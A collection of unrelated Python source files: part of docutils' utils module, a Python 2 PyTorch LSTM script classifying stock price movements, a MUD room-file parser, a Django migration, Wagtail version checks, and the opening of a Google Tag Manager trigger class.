SEVERE_LEVEL) = range(5)
def __init__(self, source, report_level, halt_level, stream=None,
debug=False, encoding=None, error_handler='backslashreplace'):
"""
:Parameters:
- `source`: The path to or description of the source data.
- `report_level`: The level at or above which warning output will
be sent to `stream`.
- `halt_level`: The level at or above which `SystemMessage`
exceptions will be raised, halting execution.
- `debug`: Show debug (level=0) system messages?
- `stream`: Where warning output is sent. Can be file-like (has a
``.write`` method), a string (file name, opened for writing),
'' (empty string) or `False` (for discarding all stream messages)
or `None` (implies `sys.stderr`; default).
- `encoding`: The output encoding.
- `error_handler`: The error handler for stderr output encoding.
"""
self.source = source
"""The path to or description of the source data."""
self.error_handler = error_handler
"""The character encoding error handler."""
self.debug_flag = debug
"""Show debug (level=0) system messages?"""
self.report_level = report_level
"""The level at or above which warning output will be sent
to `self.stream`."""
self.halt_level = halt_level
"""The level at or above which `SystemMessage` exceptions
will be raised, halting execution."""
if not isinstance(stream, ErrorOutput):
stream = ErrorOutput(stream, encoding, error_handler)
self.stream = stream
"""Where warning output is sent."""
self.encoding = encoding or getattr(stream, 'encoding', 'ascii')
"""The output character encoding."""
self.observers = []
"""List of bound methods or functions to call with each system_message
created."""
self.max_level = -1
"""The highest level system message generated so far."""
def set_conditions(self, category, report_level, halt_level,
stream=None, debug=False):
warnings.warn('docutils.utils.Reporter.set_conditions deprecated; '
'set attributes via configuration settings or directly',
DeprecationWarning, stacklevel=2)
self.report_level = report_level
self.halt_level = halt_level
if not isinstance(stream, ErrorOutput):
stream = ErrorOutput(stream, self.encoding, self.error_handler)
self.stream = stream
self.debug_flag = debug
def attach_observer(self, observer):
"""
The `observer` parameter is a function or bound method which takes one
argument, a `nodes.system_message` instance.
"""
self.observers.append(observer)
def detach_observer(self, observer):
self.observers.remove(observer)
def notify_observers(self, message):
for observer in self.observers:
observer(message)
def system_message(self, level, message, *children, **kwargs):
"""
Return a system_message object.
Raise an exception or generate a warning if appropriate.
"""
# `message` can be a `string`, `unicode`, or `Exception` instance.
if isinstance(message, Exception):
message = SafeString(message)
attributes = kwargs.copy()
if 'base_node' in kwargs:
source, line = get_source_line(kwargs['base_node'])
del attributes['base_node']
if source is not None:
attributes.setdefault('source', source)
if line is not None:
attributes.setdefault('line', line)
# assert source is not None, "node has line- but no source-argument"
if not 'source' in attributes: # 'line' is absolute line number
try: # look up (source, line-in-source)
source, line = self.get_source_and_line(attributes.get('line'))
# print "locator lookup", kwargs.get('line'), "->", source, line
except AttributeError:
source, line = None, None
if source is not None:
attributes['source'] = source
if line is not None:
attributes['line'] = line
# assert attributes['line'] is not None, (message, kwargs)
# assert attributes['source'] is not None, (message, kwargs)
attributes.setdefault('source', self.source)
msg = nodes.system_message(message, level=level,
type=self.levels[level],
*children, **attributes)
if self.stream and (level >= self.report_level
or self.debug_flag and level == self.DEBUG_LEVEL
or level >= self.halt_level):
self.stream.write(msg.astext() + '\n')
if level >= self.halt_level:
raise SystemMessage(msg, level)
if level > self.DEBUG_LEVEL or self.debug_flag:
self.notify_observers(msg)
self.max_level = max(level, self.max_level)
return msg
def debug(self, *args, **kwargs):
"""
Level-0, "DEBUG": an internal reporting issue. Typically, there is no
effect on the processing. Level-0 system messages are handled
separately from the others.
"""
if self.debug_flag:
return self.system_message(self.DEBUG_LEVEL, *args, **kwargs)
def info(self, *args, **kwargs):
"""
Level-1, "INFO": a minor issue that can be ignored. Typically there is
no effect on processing, and level-1 system messages are not reported.
"""
return self.system_message(self.INFO_LEVEL, *args, **kwargs)
def warning(self, *args, **kwargs):
"""
Level-2, "WARNING": an issue that should be addressed. If ignored,
there may be unpredictable problems with the output.
"""
return self.system_message(self.WARNING_LEVEL, *args, **kwargs)
def error(self, *args, **kwargs):
"""
Level-3, "ERROR": an error that should be addressed. If ignored, the
output will contain errors.
"""
return self.system_message(self.ERROR_LEVEL, *args, **kwargs)
def severe(self, *args, **kwargs):
"""
Level-4, "SEVERE": a severe error that must be addressed. If ignored,
the output will contain severe errors. Typically level-4 system
messages are turned into exceptions which halt processing.
"""
return self.system_message(self.SEVERE_LEVEL, *args, **kwargs)
class ExtensionOptionError(DataError): pass
class BadOptionError(ExtensionOptionError): pass
class BadOptionDataError(ExtensionOptionError): pass
class DuplicateOptionError(ExtensionOptionError): pass
def extract_extension_options(field_list, options_spec):
"""
Return a dictionary mapping extension option names to converted values.
:Parameters:
- `field_list`: A flat field list without field arguments, where each
field body consists of a single paragraph only.
- `options_spec`: Dictionary mapping known option names to a
conversion function such as `int` or `float`.
:Exceptions:
- `KeyError` for unknown option names.
- `ValueError` for invalid option values (raised by the conversion
function).
- `TypeError` for invalid option value types (raised by conversion
function).
- `DuplicateOptionError` for duplicate options.
- `BadOptionError` for invalid fields.
- `BadOptionDataError` for invalid option data (missing name,
missing data, bad quotes, etc.).
"""
option_list = extract_options(field_list)
option_dict = assemble_option_dict(option_list, options_spec)
return option_dict
def extract_options(field_list):
"""
Return a list of option (name, value) pairs from field names & bodies.
:Parameter:
`field_list`: A flat field list, where each field name is a single
word and each field body consists of a single paragraph only.
:Exceptions:
- `BadOptionError` for invalid fields.
- `BadOptionDataError` for invalid option data (missing name,
missing data, bad quotes, etc.).
"""
option_list = []
for field in field_list:
if len(field[0].astext().split()) != 1:
raise BadOptionError(
'extension option field name may not contain multiple words')
name = str(field[0].astext().lower())
body = field[1]
if len(body) == 0:
data = None
elif len(body) > 1 or not isinstance(body[0], nodes.paragraph) \
or len(body[0]) != 1 or not isinstance(body[0][0], nodes.Text):
raise BadOptionDataError(
'extension option field body may contain\n'
'a single paragraph only (option "%s")' % name)
else:
data = body[0][0].astext()
option_list.append((name, data))
return option_list
def assemble_option_dict(option_list, options_spec):
"""
Return a mapping of option names to values.
:Parameters:
- `option_list`: A list of (name, value) pairs (the output of
`extract_options()`).
- `options_spec`: Dictionary mapping known option names to a
conversion function such as `int` or `float`.
:Exceptions:
- `KeyError` for unknown option names.
- `DuplicateOptionError` for duplicate options.
- `ValueError` for invalid option values (raised by conversion
function).
- `TypeError` for invalid option value types (raised by conversion
function).
"""
options = {}
for name, value in option_list:
convertor = options_spec[name] # raises KeyError if unknown
if convertor is None:
raise KeyError(name) # or if explicitly disabled
if name in options:
raise DuplicateOptionError('duplicate option "%s"' % name)
try:
options[name] = convertor(value)
except (ValueError, TypeError), detail:
raise detail.__class__('(option: "%s"; value: %r)\n%s'
% (name, value, ' '.join(detail.args)))
return options
class NameValueError(DataError): pass
def decode_path(path):
"""
Ensure `path` is Unicode. Return `nodes.reprunicode` object.
Decode file/path string in a failsave manner if not already done.
"""
# see also http://article.gmane.org/gmane.text.docutils.user/2905
if isinstance(path, unicode):
return path
try:
path = path.decode(sys.getfilesystemencoding(), 'strict')
except AttributeError: # default value None has no decode method
return nodes.reprunicode(path)
except UnicodeDecodeError:
try:
path = path.decode('utf-8', 'strict')
except UnicodeDecodeError:
path = path.decode('ascii', 'replace')
return nodes.reprunicode(path)
def extract_name_value(line):
"""
Return a list of (name, value) from a line of the form "name=value ...".
:Exception:
`NameValueError` for invalid input (missing name, missing data, bad
quotes, etc.).
"""
attlist = []
while line:
equals = line.find('=')
if equals == -1:
raise NameValueError('missing "="')
attname = line[:equals].strip()
if equals == 0 or not attname:
raise NameValueError(
'missing attribute name before "="')
line = line[equals+1:].lstrip()
if not line:
raise NameValueError(
'missing value after "%s="' % attname)
if line[0] in '\'"':
endquote = line.find(line[0], 1)
if endquote == -1:
raise NameValueError(
'attribute "%s" missing end quote (%s)'
% (attname, line[0]))
if len(line) > endquote + 1 and line[endquote + 1].strip():
raise NameValueError(
'attribute "%s" end quote (%s) not followed by '
'whitespace' % (attname, line[0]))
data = line[1:endquote]
line = line[endquote+1:].lstrip()
else:
space = line.find(' ')
if space == -1:
data = line
line = ''
else:
data = line[:space]
line = line[space+1:].lstrip()
attlist.append((attname.lower(), data))
return attlist
def new_reporter(source_path, settings):
"""
Return a new Reporter object.
:Parameters:
`source` : string
The path to or description of the source text of the document.
`settings` : optparse.Values object
Runtime settings.
"""
reporter = Reporter(
source_path, settings.report_level, settings.halt_level,
stream=settings.warning_stream, debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
return reporter
def new_document(source_path, settings=None):
"""
Return a new empty document object.
:Parameters:
`source_path` : string
The path to or description of the source text of the document.
`settings` : optparse.Values object
Runtime settings. If none are provided, a default core set will
be used. If you will use the document object with any Docutils
components, you must provide their default settings as well. For
example, if parsing, at least provide the parser settings,
obtainable as follows::
settings = docutils.frontend.OptionParser(
components=(docutils.parsers.rst.Parser,)
).get_default_values()
"""
from docutils import frontend
if settings is None:
settings = frontend.OptionParser().get_default_values()
source_path = decode_path(source_path)
reporter = new_reporter(source_path, settings)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
return document
def clean_rcs_keywords(paragraph, keyword_substitutions):
if len(paragraph) == 1 and isinstance(paragraph[0], nodes.Text):
textnode = paragraph[0]
for pattern, substitution in keyword_substitutions:
match = pattern.search(textnode)
if match:
paragraph[0] = nodes.Text(pattern.sub(substitution, textnode))
return
def relative_path(source, target):
"""
Build and return a path to `target`, relative to `source` (both files).
If there is no common prefix, return the absolute path to `target`.
"""
source_parts = os.path.abspath(source or type(target)('dummy_file')
).split(os.sep)
target_parts = os.path.abspath(target).split(os.sep)
# Check first 2 parts because '/dir'.split('/') == ['', 'dir']:
if source_parts[:2] != target_parts[:2]:
# Nothing in common between paths.
# Return absolute path, using '/' for URLs:
return '/'.join(target_parts)
source_parts.reverse()
target_parts.reverse()
while (source_parts and target_parts
and source_parts[-1] == target_parts[-1]):
# Remove path components in common:
source_parts.pop()
target_parts.pop()
target_parts.reverse()
parts = ['..'] * (len(source_parts) - 1) + target_parts
return '/'.join(parts)
def get_stylesheet_reference(settings, relative_to=None):
"""
Retrieve a stylesheet reference from the settings object.
Deprecated. Use get_stylesheet_list() instead to
enable specification of multiple stylesheets as a comma-separated
list.
"""
if settings.stylesheet_path:
assert not settings.stylesheet, (
'stylesheet and stylesheet_path are mutually exclusive.')
if relative_to == None:
relative_to = settings._destination
return relative_path(relative_to, settings.stylesheet_path)
else:
return settings.stylesheet
# Return 'stylesheet' or 'stylesheet_path' arguments as list.
#
# The original settings arguments are kept unchanged: you can test
# with e.g. ``if settings.stylesheet_path:``
#
# Differences to ``get_stylesheet_reference``:
# * return value is a list
# * no re-writing of the path (and therefore no optional argument)
# (if required, use ``utils.relative_path(source, target)``
# in the calling script)
def get_stylesheet_list(settings):
"""
Retrieve list of stylesheet references from the settings object.
"""
assert not (settings.stylesheet and settings.stylesheet_path), (
'stylesheet and stylesheet_path are mutually exclusive.')
stylesheets = settings.stylesheet_path or settings.stylesheet or []
# programmatically set default can be string or unicode:
if not isinstance(stylesheets, list):
stylesheets = [path.strip() for path in stylesheets.split(',')]
# expand relative paths if found in stylesheet-dirs:
return [find_file_in_dirs(path, settings.stylesheet_dirs)
for path in stylesheets]
def find_file_in_dirs(path, dirs):
"""
Search for `path` in the list of directories `dirs`.
Return the first expansion that matches an existing file.
"""
if os.path.isabs(path):
return path
for d in dirs:
if d == '.':
f = path
else:
d = os.path.expanduser(d)
f = os.path.join(d, path)
if os.path.exists(f):
return f
return path
def get_trim_footnote_ref_space(settings):
"""
Return whether or not to trim footnote space.
If trim_footnote_reference_space is not None, return it.
If trim_footnote_reference_space is None, return False unless the
footnote reference style is 'superscript'.
"""
if settings.trim_footnote_reference_space is None:
return hasattr(settings, 'footnote_references') and \
settings.footnote_references == 'superscript'
else:
return settings.trim_footnote_reference_space
def get_source_line(node):
"""
Return the "source" and "line" attributes from the `node` given or from
its closest ancestor.
"""
while node:
if node.source or node.line:
return node.source, node.line
node = node.parent
return None, None
def escape2null(text):
"""Return a string with escape-backslashes converted to nulls."""
parts = []
start = 0
while True:
found = text.find('\\', start)
if found == -1:
parts.append(text[start:])
return ''.join(parts)
parts.append(text[start:found])
parts.append('\x00' + text[found+1:found+2])
start = found + 2 # skip character after escape
# `unescape` definition moved to `nodes` to avoid circular import dependency.
def split_escaped_whitespace(text):
"""
Split `text` on escaped whitespace (null+space or null+newline).
Return a list of strings.
"""
strings = text.split('\x00 ')
strings = [string.split('\x00\n') for string in strings]
# flatten list of lists of strings to list of strings:
return list(itertools.chain(*strings))
def strip_combining_chars(text):
if isinstance(text, str) and sys.version_info < (3,0):
return text
return u''.join([c for c in text if not unicodedata.combining(c)])
def find_combining_chars(text):
"""Return indices of all combining chars in Unicode string `text`.
>>> from docutils.utils import find_combining_chars
>>> find_combining_chars(u'A t̆ab̆lĕ')
[3, 6, 9]
"""
if isinstance(text, str) and sys.version_info < (3,0):
return []
return [i for i,c in enumerate(text) if unicodedata.combining(c)]
def column_indices(text):
"""Indices of Unicode string `text` when skipping combining characters.
>>> from docutils.utils import column_indices
>>> column_indices(u'A t̆ab̆lĕ')
[0, 1, 2, 4, 5, 7, 8]
"""
# TODO: account for asian wide chars here instead of using dummy
# replacements in the tableparser?
string_indices = range(len(text))
for index in find_combining_chars(text):
string_indices[index] = None
return [i for i in string_indices if i is not None]
east_asian_widths = {'W': 2, # Wide
'F': 2, # Full-width (wide)
'Na': 1, # Narrow
'H': 1, # Half-width (narrow)
'N': 1, # Neutral (not East Asian, treated as narrow)
'A': 1} # Ambiguous (s/b wide in East Asian context,
# narrow otherwise, but that doesn't work)
"""Mapping of result codes from `unicodedata.east_asian_widt()` to character
column widths."""
def column_width(text):
"""Return the column width of text.
Correct ``len(text)`` for wide East Asian and combining Unicode chars.
"""
if isinstance(text, str) and sys.version_info < (3,0):
return len(text)
width = sum([east_asian_widths[unicodedata.east_asian_width(c)]
for c in text])
# correction for combining chars:
width -= len(find_combining_chars(text))
return width
def uniq(L):
r = []
for item in L:
if not item in r:
r.append(item)
return r
def unique_combinations(items, n):
"""Return `itertools.combinations`."""
warnings.warn('docutils.utils.unique_combinations is deprecated; '
'use itertools.combinations directly.',
DeprecationWarning, stacklevel=2)
return itertools.combinations(items, n)
def normalize_language_tag(tag):
"""Return a list of normalized combinations for a `BCP 47` language tag.
Example:
>>> from docutils.utils import normalize_language_tag
>>> normalize_language_tag('de_AT-1901')
['de-at-1901', 'de-at', 'de-1901', 'de']
>>> normalize_language_tag('de-CH-x_altquot')
['de-ch-x-altquot', 'de-ch', 'de-x-altquot', 'de']
"""
# normalize:
tag = tag.lower().replace('-','_')
# split (except singletons, which mark the following tag as non-standard):
tag = re.sub(r'_([a-zA-Z0-9])_', r'_\1-', tag)
subtags = [subtag for subtag in tag.split('_')]
base_tag = (subtags.pop(0),)
# find all combinations of subtags
taglist = []
for n in range(len(subtags), 0, -1):
# for tags in unique_combinations(subtags, n):
for tags in itertools.combinations(subtags, n):
taglist.append('-'.join(base_tag+tags))
taglist += base_tag
return taglist
class DependencyList(object):
"""
List of dependencies, with file recording support.
Note that the output file is not automatically closed. You have
to explicitly call the close() method.
"""
def __init__(self, output_file=None, dependencies=[]):
"""
Initialize the dependency list, automatically setting the
output file to `output_file` (see `set_output()`) and adding
all supplied dependencies.
"""
self.set_output(output_file)
for i in dependencies:
self.add(i)
def set_output(self, output_file):
"""
Set the output file and clear the list of already added
dependencies.
`output_file` must be a string. The specified file is
immediately overwritten.
If output_file is '-', the output will be written to stdout.
If it is None, no file output is done when calling add().
"""
self.list = []
if output_file:
if output_file == '-':
of = None
else:
of = output_file
self.file = docutils.io.FileOutput(destination_path=of,
encoding='utf8', autoclose=False)
else:
self.file = None
def add(self, *filenames):
"""
If the dependency `filename` has not already been added,
append it to self.list and print it to self.file if self.file
is not None.
"""
for filename in filenames:
if not filename in self.list:
self.list.append(filename)
if self.file is not None:
self.file.write(filename+'\n')
def close(self):
"""
Close the output file.
"""
self.file.close()
self.file = None
def __repr__(self):
try:
output_file = self.file.name
except AttributeError:
output_file = None
return '%s(%r, %s)' % (self.__class__.__name__, output_file, self.list)
release_level_abbreviations = {
'alpha': 'a',
'beta': 'b',
'candidate': 'rc',
'final': '',}
def version_identifier(version_info=None):
"""
Return a version identifier string built from `version_info`, a
`docutils.VersionInfo` namedtuple instance or compatible tuple. If
`version_info` is not provided, by default return a version identifier
string based on `docutils.__version_info__` (i.e. the current Docutils
version).
"""
if version_info is None:
version_info = __version_info__
if version_info.micro:
micro = '.%s' % version_info.micro
else:
# 0 is omitted:
micro = ''
releaselevel = release_level_abbreviations[version_info.releaselevel]
if version_info.serial:
serial = version_info.serial
else:
# 0 is omitted:
serial = ''
if version_info.release:
dev = ''
else:
dev = '.dev'
version = '%s.%s%s%s%s%s' % (
version_info.major,
version_info.minor,
micro,
releaselevel,
serial,
dev)
return version
|
import argparse
import time
import math
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from torch.autograd import Variable
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
parser = argparse.ArgumentParser(description='PyTorch Stock Value Prediction Model')
parser.add_argument('--data', type=str, default='./data/sz002821_2',
help='location of the data')
parser.add_argument('--nfeatures', type=int, default=30,
help='dimension of features')
parser.add_argument('--nhid', type=int, default=50,
help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=3,
help='number of layers')
parser.add_argument('--lr', type=float, default=0.001,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=5,
help='gradient clipping')
parser.add_argument('--lr_decay', type=float, default=0.5,
help='decay lr by the rate')
parser.add_argument('--epochs', type=int, default=50,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=35,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
help='report interval')
parser.add_argument('--use_define', action='store_true')
parser.add_argument('--save', type=str, default='./models/rnn.pt',
help='path to save the final model')
args = parser.parse_args()
print '{:=^30}'.format('all args')
for arg in vars(args):
print ' '.join(map(str, (arg, getattr(args, arg))))
class DataIter(object):
def __init__(self, path, batch_size, seq_len, scaler, cuda=False):
self.path = path
self.batch_size = batch_size
self.seq_len = seq_len
self.cuda = cuda
self.scaler = scaler
self.build_data()
self.batchify()
def build_data(self):
#data_type = np.dtype([('features1', 'f8', (19, )), ('features2', 'f8', (11, )),('labels1', 'i8', (1, )), ('labels2', 'i8', (1, ))])
data_type = np.dtype([('features1', 'f8', (30, )), ('labels1', 'i8', (1, )), ('labels2', 'i8', (1, ))])
data = np.loadtxt(self.path, data_type, delimiter=' ')
features1 = data['features1']
#features2 = data['features2']
labels1 = data['labels1']
labels2 = data['labels2']
#features1 = 0.2 * (features1 - 130)
#np.concatenate((features1, features2, features1 * features2), axis=1)
if self.scaler == None:
self.scaler = StandardScaler().fit(features1)
features1 = self.scaler.transform(features1)
features = features1
#features = np.concatenate((features1, features2), axis=1)
count0 = 0
count1 = 0
count2 = 0
for i in range(labels1.shape[0]):
if labels1[i] + labels2[i] > 0:
labels1[i] = 2
count2 += 1
elif labels1[i] + labels2[i] == 0:
labels1[i] = 1
count1 += 1
else:
labels1[i] = 0
count0 += 1
count = float(count0+count1+count2)
print "Class 0: %.4f%%, Class 1: %.4f%%, Class 2: %.4f%%"%(count0/count*100, count1/count*100, count2/count*100)
#labels1[i] = labels1[i] *201 + labels2[i]
#for i in range(labels1.shape[0]):
#labels1[i] += 100
#for i in range(labels2.shape[0]):
#labels2[i] += 100
#for i in range(labels1.shape[0]):
#labels1[i] = labels1[i] *201 + labels2[i]
features = torch.Tensor(features)
labels1 = torch.LongTensor(labels1)
labels2 = torch.LongTensor(labels2)
self.data = features
self.label = labels1
return
def batchify(self):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = self.data.size(0) // self.batch_size
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = self.data[:nbatch * self.batch_size]
label = self.label.t().contiguous()
label = label[:, :nbatch * self.batch_size]
# Evenly divide the data across the bsz batches.
data = data.view(-1, self.batch_size, args.nfeatures).contiguous()
label = label.view(-1, self.batch_size).contiguous()
self.data = data.cuda() if self.cuda else data
self.label = label.cuda() if self.cuda else label
def __iter__(self):
for idx in range(0, self.data.size(0) - 1, self.seq_len):
seq_len = min(self.seq_len, len(self.data) - 1 - idx)
data = Variable(self.data[idx:idx+seq_len])
target = Variable(self.label[idx:idx+seq_len].view(-1))
yield data, target
def __len__(self):
return self.data.size(0) // self.seq_len
class RNNModel(nn.Module):
def __init__(self, nfed, nhid, noutputs, nlayers=1, dropout=0.5):
super(RNNModel, self).__init__()
self.nlayers = nlayers
self.nhid = nhid
self.drop = nn.Dropout(dropout)
self.rnn = nn.LSTM(nfed, nhid, nlayers, dropout=dropout)
self.decoder = nn.Linear(nhid, noutputs)
self.init_weights()
self.rnn_type = "LSTM"
def init_weights(self):
initrange = 0.1
self.decoder.bias.data.fill_(0)
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden):
emb = self.drop(input)
output, hidden = self.rnn(emb, hidden)
output = self.drop(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden
def init_hidden(self, bsz):
weight = next(self.parameters()).data
if self.rnn_type == 'LSTM':
return (Variable(weight.new(self.nlayers, bsz, self.nhid).zero_()),
Variable(weight.new(self.nlayers, bsz, self.nhid).zero_()))
else:
return Variable(weight.new(self.nlayers, bsz, self.nhid).zero_())
def count(pred, label, num, results, labels):
count = 0
pred = pred.cpu()
label = label.cpu()
for i in range(num):
results.append(pred.data[i][0])
labels.append(label.data[i])
def repackage_hidden(h):
"""Wraps hidden states in new Variables, to detach them from their history."""
if type(h) == Variable:
return Variable(h.data)
else:
return tuple(repackage_hidden(v) for v in h)
class Trainer(object):
def __init__(self, model,
train_iter, valid_iter, test_iter=None,
max_epochs=50):
self.model = model
self.optimizer = optim.Adam(self.model.parameters(), lr = args.lr)
self.criterion = nn.CrossEntropyLoss()
self.train_iter = train_iter
self.valid_iter = valid_iter
self.test_iter = test_iter
self.max_epochs = max_epochs
self.noutput = self.model.decoder.weight.size(0)
self.results = []
self.labels = []
def score(self):
acc = accuracy_score(self.labels, self.results)
print "total acc: %.4f%%"%(acc * 100)
for i in range(3):
pre = precision_score(self.labels, self.results, labels=[i], average='micro')
rec = recall_score(self.labels, self.results, labels=[i], average='micro')
f1 = f1_score(self.labels, self.results, labels=[i], average='micro')
print "for class %d:"%(i)
print "precision: %.4f, recall: %.4f, f1: %.4f "%(pre, rec, f1)
print ""
return acc
def clear_results(self):
self.results = []
self.labels = []
return
def __forward(self, data, hidden, target):
output, hidden = self.model(data, hidden)
loss = self.criterion(output.view(-1, self.noutput), target)
return output, hidden, loss
def __train(self, lr, epoch):
self.model.train()
#self.clear_results()
total_loss = 0
start_time = time.time()
hidden = self.model.init_hidden(self.train_iter.batch_size)
for batch, (d, targets) in enumerate(self.train_iter):
self.model.zero_grad()
hidden = repackage_hidden(hidden)
output, hidden, loss = self.__forward(d, hidden, targets)
#count(torch.max(output.view(-1, self.noutput), 1)[1], targets, targets.size()[0], self.results, self.labels)
#loss.backward(retain_variables=True)
loss.backward()
#torch.nn.utils.clip_grad_norm(self.model.parameters(), 1.0 * args.clip / args.batch_size)
self.optimizer.step()
total_loss += loss.data
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss[0] / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | lr {:02.5f} | wps {:5.2f} | '
'loss {:5.2f}'.format(
epoch, lr,
args.batch_size * args.bptt / (elapsed / args.log_interval), cur_loss))
#self.score()
total_loss = 0
start_time = time.time()
def train(self):
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, self.max_epochs+1):
epoch_start_time = time.time()
self.__train(lr, epoch)
val_loss = self.evaluate(self.valid_iter)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s '.format(epoch, (time.time() - epoch_start_time),))
print('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss > best_val_loss:
with open(args.save, 'wb') as f:
torch.save(self.model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
print("restore the model.")
model = torch.load(args.save)
lr *= args.lr_decay
self.optimizer = optim.Adam(self.model.parameters(), lr = lr)
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb') as f:
self.model = torch.load(f)
if not self.test_iter is None:
self.evaluate(self.valid_iter)
self.evaluate(self.test_iter, 'test')
def evaluate(self, data_source, prefix='valid'):
# Turn on evaluation mode which disables dropout.
self.model.eval()
self.clear_results()
total_loss = 0
hidden = self.model.init_hidden(eval_batch_size)
for d, targets in data_source:
output, hidden, loss = self.__forward(d, hidden, targets)
count(torch.max(output.view(-1, self.noutput), 1)[1], targets, targets.size()[0], self.results, self.labels)
total_loss += loss.data
ave_loss = total_loss[0] / len(data_source)
print('| {0} loss {1:5.2f} | {0} '.format(prefix, ave_loss))
acc = self.score()
return acc
if __name__ == '__main__':
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
path = args.data + '/'
eval_batch_size = 10
scaler = None
train_iter = DataIter(
path + 'train.txt',
args.batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
scaler = train_iter.scaler
valid_iter = DataIter(
path + 'valid.txt',
eval_batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
test_iter = DataIter(
path + 'test.txt',
eval_batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
###############################################################################
# Build the model
###############################################################################
model = RNNModel(
nfed = args.nfeatures,
nhid = args.nhid,
noutputs = 3,
nlayers = args.nlayers,
dropout = args.dropout,
)
if args.cuda:
model.cuda()
trainer = Trainer(
model = model,
train_iter = train_iter,
valid_iter = valid_iter,
test_iter = test_iter,
max_epochs = args.epochs
)
trainer.train()
|
# coding: utf-8
import re
from constants import ROOM_DOOR_FLAGS
from constants import ROOM_FLAGS
from constants import ROOM_SECTOR_TYPES
from utils import bitvector_to_flags
from utils import clean_bitvector
from utils import lookup_value_to_dict
EXIT_RE = r"""D(\d+)
(.*?)~
(.*?)~
(.*?)
"""
EXIT_PATTERN = re.compile(EXIT_RE, re.DOTALL | re.MULTILINE)
EXTRA_DESC_RE = r"""E
(.*?)~
(.*?)
~"""
EXTRA_DESC_PATTERN = re.compile(EXTRA_DESC_RE, re.DOTALL)
def parse_exits(text):
exits = []
matches = EXIT_PATTERN.findall(text)
for match in matches:
direction, desc, keys, other = match
desc = desc.rstrip('\n')
flag, key_num, to = other.strip().split()
exit = dict()
exit['dir'] = int(direction)
exit['desc'] = desc
exit['keywords'] = keys.split()
exit['key_number'] = int(key_num)
exit['room_linked'] = int(to)
exit['door_flag'] = {
'value': int(flag),
'note': ROOM_DOOR_FLAGS.get(int(flag), None)
}
exits.append(exit)
return exits
def parse_extra_descs(text):
extra_descs = []
for keywords, desc in EXTRA_DESC_PATTERN.findall(text):
extra_desc = dict(keywords=keywords.split(), desc=desc)
extra_descs.append(extra_desc)
return extra_descs
def parse_room(text):
parts = text.split('~')
vnum, name = parts[0].split('\n')
desc = parts[1].strip()
zone, flags, sector = parts[2].strip() \
.split('\n')[0].strip().split(' ')
d = dict()
d['id'] = int(vnum)
d['name'] = name.strip()
d['desc'] = desc.strip('\n')
d['zone_number'] = int(zone)
flags = clean_bitvector(flags)
d['flags'] = []
if flags:
d['flags'] = bitvector_to_flags(flags, ROOM_FLAGS)
# sector type flag is always an int
d['sector_type'] = lookup_value_to_dict(int(sector), ROOM_SECTOR_TYPES)
bottom_matter = '~'.join(parts[2:])
d['exits'] = parse_exits(bottom_matter)
d['extra_descs'] = parse_extra_descs(bottom_matter)
return d
|
# Generated by Django 2.2.7 on 2021-12-02 14:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ugc', '0014_new'),
]
operations = [
migrations.AddField(
model_name='new',
name='heading_en',
field=models.CharField(blank=True, max_length=500, null=True),
),
migrations.AddField(
model_name='new',
name='text_en',
field=models.TextField(blank=True, null=True),
),
]
|
import re
from wagtail import __version__ as WAGTAIL_VERSION
def is_wagtail_version_more_than_equal_to_2_5():
expression = '^((2.([5-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
def is_wagtail_version_more_than_equal_to_2_0():
expression = '^((2.([0-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
|
"""trigger.py"""
import gtm_manager.base
import gtm_manager.parameter
from gtm_manager.utils import param_dict
class GTMTrigger(gtm_manager.base.GTMBase):
"""Open a specific GTM Trigger.
Args:
trigger (dict): An API representation of the GTM Trigger. If provided, the resource will be
not be loaded from the API. :code:`trigger` or :code:`path` argument must be set.
path (str): The API path to the resource, i.e.
"accounts/1234/containers/1234/workspaces/1234/trigger/123". If provided instead of
:code:`trigger`, the representation will be loaded from the API. :code:`path` or
:code:`trigger` argument must be set.
parent (str): Required, when the instance is initialized with a :code:`trigger` argument to
explizitly set the parent path, i.e. "accounts/1234/containers/1234/workspaces/1234"
**kwargs: Additional keyword args to initialize the base class.
"""
def __init__(self, trigger=None, path=None, parent=None, **kwargs):
super().__init__(**kwargs)
self.triggers_service = (
self.service.accounts().containers().workspaces().triggers()
